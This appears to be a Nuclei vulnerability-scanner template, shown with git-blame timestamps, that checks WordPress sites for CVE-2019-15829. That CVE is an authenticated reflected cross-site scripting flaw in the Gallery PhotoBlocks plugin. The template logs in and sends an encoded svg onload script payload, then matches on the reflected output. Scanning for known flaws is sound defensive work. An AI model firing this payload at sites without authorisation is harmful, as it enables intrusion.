2023-10-17 07:20:28 +00:00
|
|
|
id: CVE-2019-15829
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
|
|
|
|
author: r3Y3r53
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
|
2023-10-17 17:21:59 +00:00
|
|
|
remediation: Fixed in 1.1.43
|
2023-10-17 07:20:28 +00:00
|
|
|
reference:
|
2023-10-17 17:21:59 +00:00
|
|
|
- https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/
|
2023-10-17 07:20:28 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15829
|
2023-10-17 17:21:59 +00:00
|
|
|
- https://wordpress.org/plugins/photoblocks-grid-gallery/
|
2023-10-17 17:52:26 +00:00
|
|
|
- https://wordpress.org/plugins/photoblocks-grid-gallery/#developers
|
|
|
|
- https://wpvulndb.com/vulnerabilities/9443
|
2023-10-17 17:21:59 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 4.8
|
2023-10-17 17:52:26 +00:00
|
|
|
cve-id: CVE-2019-15829
|
2023-10-17 17:21:59 +00:00
|
|
|
cwe-id: CWE-79
|
2023-10-18 16:26:30 +00:00
|
|
|
epss-score: 0.00146
|
2024-04-08 11:30:07 +00:00
|
|
|
epss-percentile: 0.49845
|
2023-10-17 17:52:26 +00:00
|
|
|
cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:*
|
2023-10-17 07:20:28 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-17 17:52:26 +00:00
|
|
|
max-request: 2
|
|
|
|
vendor: greentreelabs
|
|
|
|
product: gallery_photoblocks
|
|
|
|
framework: wordpress
|
2023-10-17 17:21:59 +00:00
|
|
|
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs
|
2023-10-17 07:20:28 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
|
|
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
|
|
|
|
- 'contains(body_2, "post galleries!")'
|
|
|
|
condition: and
|
2024-01-30 06:46:18 +00:00
|
|
|
# digest: 490a0046304402205217fa5d440959f2c80a587abe7bebae86cb1964d9c81277de7f8ce83833bfee02202d3d0b408e755ad0ecb80c3a9827a8c06a6c187d00b50e6c01451d50ac04f735:922c64590222798bb761d5b6d8e72950
|